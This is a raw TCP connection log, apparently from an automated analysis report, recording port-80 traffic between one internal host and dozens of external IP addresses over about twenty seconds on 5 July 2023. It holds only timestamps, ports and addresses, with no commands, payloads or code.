                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.808968067 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.813283920 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.813316107 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.813457012 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.822376013 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.822432041 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.822662115 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.831536055 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.831599951 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.831805944 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.831861973 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.840591908 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.840640068 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.840851068 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.849663973 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.849709034 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.849858046 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.849956036 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.858798981 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.858858109 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.859069109 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.859133959 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.867904902 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.867979050 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.868184090 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.868221045 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.876943111 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.876980066 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.877211094 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.878763914 CEST8049775188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.878797054 CEST8049775188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.878870964 CEST4977580192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.886187077 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.886229038 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.886425018 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.886481047 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.938878059 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.938945055 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.939299107 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.943420887 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.943466902 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.943648100 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.952528000 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.952564001 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.952709913 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.952752113 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.960431099 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.960469961 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.960731983 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.968326092 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.968372107 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.968537092 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.968584061 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.976229906 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.976274967 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.976689100 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.984025955 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.984061956 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.984204054 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.984251976 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.992038965 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.992083073 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.992311001 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.022444010 CEST4976580192.168.2.6210.140.73.39
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.109499931 CEST4977780192.168.2.623.227.38.74
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.126188040 CEST804977723.227.38.74192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.126300097 CEST4977780192.168.2.623.227.38.74
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.127573967 CEST4977780192.168.2.623.227.38.74
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.144090891 CEST804977723.227.38.74192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.288680077 CEST804977723.227.38.74192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.288784027 CEST4977780192.168.2.623.227.38.74
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.382415056 CEST4977880192.168.2.693.187.206.66
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.463511944 CEST4977980192.168.2.6195.78.66.50
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.514236927 CEST8049779195.78.66.50192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.514935017 CEST4977980192.168.2.6195.78.66.50
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.515311956 CEST4977980192.168.2.6195.78.66.50
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.565920115 CEST8049779195.78.66.50192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.567773104 CEST8049779195.78.66.50192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.567928076 CEST4977980192.168.2.6195.78.66.50
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.638904095 CEST8049727202.254.236.40192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.639020920 CEST4972780192.168.2.6202.254.236.40
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.719157934 CEST4978080192.168.2.6165.227.252.190
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.817893982 CEST8049780165.227.252.190192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.818034887 CEST4978080192.168.2.6165.227.252.190
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.826082945 CEST4978080192.168.2.6165.227.252.190
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.826805115 CEST4978180192.168.2.672.251.233.245
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.924020052 CEST8049780165.227.252.190192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.925832987 CEST8049780165.227.252.190192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.925987959 CEST4978080192.168.2.6165.227.252.190
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:01.091454983 CEST804978172.251.233.245192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:01.091593981 CEST4978180192.168.2.672.251.233.245
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:01.092463017 CEST4978180192.168.2.672.251.233.245
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:01.128669024 CEST4978280192.168.2.6213.186.33.40
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:01.156234980 CEST8049782213.186.33.40192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:01.156456947 CEST4978280192.168.2.6213.186.33.40
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:01.179450035 CEST4978280192.168.2.6213.186.33.40
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:01.210159063 CEST8049782213.186.33.40192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:01.210333109 CEST4978280192.168.2.6213.186.33.40
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:01.282936096 CEST4978280192.168.2.6213.186.33.40
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:01.314126968 CEST8049782213.186.33.40192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:01.314300060 CEST4978280192.168.2.6213.186.33.40
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:01.343616009 CEST804975239.99.233.155192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:01.343755007 CEST4975280192.168.2.639.99.233.155
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:01.356935024 CEST804978172.251.233.245192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:01.357094049 CEST804978172.251.233.245192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:01.357120991 CEST804978172.251.233.245192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:01.357211113 CEST4978180192.168.2.672.251.233.245
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:01.357285023 CEST4978180192.168.2.672.251.233.245
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:01.594439030 CEST4978180192.168.2.672.251.233.245
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:01.859092951 CEST804978172.251.233.245192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:02.421339035 CEST80497663.65.101.129192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:02.421489954 CEST4976680192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:02.803704023 CEST4977680192.168.2.6206.191.152.37
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:03.397466898 CEST4977880192.168.2.693.187.206.66
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:03.433418036 CEST8049715213.186.33.17192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:03.433634043 CEST4971580192.168.2.6213.186.33.17
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:03.485764980 CEST804977893.187.206.66192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:03.486015081 CEST4977880192.168.2.693.187.206.66
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:03.962409019 CEST4977880192.168.2.693.187.206.66
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:04.053744078 CEST4975680192.168.2.6198.100.146.220
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:04.054106951 CEST804977893.187.206.66192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:04.054141998 CEST804977893.187.206.66192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:04.054275036 CEST4977880192.168.2.693.187.206.66
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:04.475428104 CEST4978380192.168.2.696.91.204.114
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:05.929707050 CEST8049780165.227.252.190192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:05.931406021 CEST4978080192.168.2.6165.227.252.190
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:06.209904909 CEST4976580192.168.2.6210.140.73.39
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:06.874264956 CEST8049762162.43.120.128192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:06.886018991 CEST4976280192.168.2.6162.43.120.128
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:07.600012064 CEST4978380192.168.2.696.91.204.114
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:08.897428036 CEST4977680192.168.2.6206.191.152.37
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:09.162539959 CEST8049776206.191.152.37192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:09.181432009 CEST4977680192.168.2.6206.191.152.37
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:09.392383099 CEST4977680192.168.2.6206.191.152.37
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:09.657270908 CEST8049776206.191.152.37192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:09.657404900 CEST8049776206.191.152.37192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:09.657485962 CEST8049776206.191.152.37192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:09.668133020 CEST4977680192.168.2.6206.191.152.37
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:09.750437021 CEST4977680192.168.2.6206.191.152.37
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:10.015481949 CEST8049776206.191.152.37192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:10.230048895 CEST8049751170.82.174.30192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:10.233824968 CEST4975180192.168.2.6170.82.174.30
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:10.502476931 CEST8049758185.53.177.50192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:10.512443066 CEST4975880192.168.2.6185.53.177.50
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.110199928 CEST4978480192.168.2.6135.181.73.98
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.148390055 CEST8049784135.181.73.98192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.148868084 CEST4978480192.168.2.6135.181.73.98
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.169955015 CEST4978480192.168.2.6135.181.73.98
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.171607971 CEST4978580192.168.2.618.165.183.21
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.183414936 CEST804978518.165.183.21192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.189101934 CEST4978580192.168.2.618.165.183.21
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.189683914 CEST4978580192.168.2.618.165.183.21
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.200946093 CEST804978518.165.183.21192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.201136112 CEST804978518.165.183.21192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.209028006 CEST8049784135.181.73.98192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.209201097 CEST4978580192.168.2.618.165.183.21
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.209445000 CEST8049784135.181.73.98192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.229809046 CEST4978480192.168.2.6135.181.73.98
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.544408083 CEST8049779195.78.66.50192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.544822931 CEST4977980192.168.2.6195.78.66.50
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.768214941 CEST4978480192.168.2.6135.181.73.98
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.768899918 CEST4978580192.168.2.618.165.183.21
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.780095100 CEST804978518.165.183.21192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.796318054 CEST4978580192.168.2.618.165.183.21
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.806466103 CEST8049784135.181.73.98192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.806641102 CEST4978480192.168.2.6135.181.73.98
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:13.621243000 CEST4978680192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:13.704664946 CEST4978380192.168.2.696.91.204.114
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:13.777928114 CEST80497863.140.13.188192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:13.778175116 CEST4978680192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:13.807482004 CEST8049784135.181.73.98192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:13.807611942 CEST4978480192.168.2.6135.181.73.98
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:13.809628963 CEST4978780192.168.2.6211.1.226.67
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:13.810177088 CEST4978680192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:13.966475010 CEST80497863.140.13.188192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:13.966522932 CEST80497863.140.13.188192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:13.966619968 CEST4978680192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:13.966619968 CEST4978680192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:13.988393068 CEST4978680192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:14.072050095 CEST4978880192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:14.090015888 CEST8049787211.1.226.67192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:14.090189934 CEST4978780192.168.2.6211.1.226.67
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:14.132813931 CEST4978780192.168.2.6211.1.226.67
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:14.144581079 CEST80497863.140.13.188192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:14.228831053 CEST80497883.140.13.188192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:14.228971004 CEST4978880192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:14.249159098 CEST4978880192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:14.405652046 CEST80497883.140.13.188192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:14.405711889 CEST80497883.140.13.188192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:14.405765057 CEST4978880192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:14.408209085 CEST4978880192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:14.413232088 CEST8049787211.1.226.67192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:14.413333893 CEST8049787211.1.226.67192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:14.413435936 CEST4978780192.168.2.6211.1.226.67
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:14.477078915 CEST4978880192.168.2.63.140.13.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:14.634377956 CEST80497883.140.13.188192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:14.696373940 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:14.696518898 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:14.725313902 CEST4978780192.168.2.6211.1.226.67
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.000699997 CEST4978980192.168.2.6217.19.237.54
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.008618116 CEST8049787211.1.226.67192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.008713007 CEST4978780192.168.2.6211.1.226.67
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.024997950 CEST8049789217.19.237.54192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.025146008 CEST4978980192.168.2.6217.19.237.54
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.044245005 CEST4978980192.168.2.6217.19.237.54
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.073896885 CEST8049789217.19.237.54192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.074901104 CEST8049789217.19.237.54192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.074934959 CEST804977893.187.206.66192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.075053930 CEST4977880192.168.2.693.187.206.66
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.075100899 CEST4978980192.168.2.6217.19.237.54
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.659023046 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.675803900 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.675976038 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.676608086 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.687803030 CEST4979180192.168.2.613.248.169.48
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.693135977 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.707675934 CEST804979113.248.169.48192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.707797050 CEST4979180192.168.2.613.248.169.48
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.737588882 CEST4979180192.168.2.613.248.169.48
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.757484913 CEST804979113.248.169.48192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.888834953 CEST804979113.248.169.48192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.888979912 CEST4979180192.168.2.613.248.169.48
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.316139936 CEST8049782213.186.33.40192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.316282988 CEST4978280192.168.2.6213.186.33.40
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.547549963 CEST4979280192.168.2.6188.166.152.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.578444004 CEST8049792188.166.152.188192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.578574896 CEST4979280192.168.2.6188.166.152.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.578939915 CEST4979280192.168.2.6188.166.152.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.609512091 CEST8049792188.166.152.188192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.610209942 CEST8049792188.166.152.188192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.610299110 CEST4979280192.168.2.6188.166.152.188
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.621416092 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.621452093 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.621475935 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.621512890 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.621525049 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.621546030 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.621556997 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.621572018 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.621598005 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.621619940 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.621634007 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.621634007 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.621634007 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.621650934 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.621658087 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.621681929 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.621704102 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.621725082 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.621741056 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.621741056 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.621742010 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.621757030 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.622112036 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.622142076 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.622167110 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.622180939 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.622194052 CEST4979080192.168.2.6172.67.70.223
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.622196913 CEST8049790172.67.70.223192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.622210026 CEST4979080192.168.2.6172.67.70.223
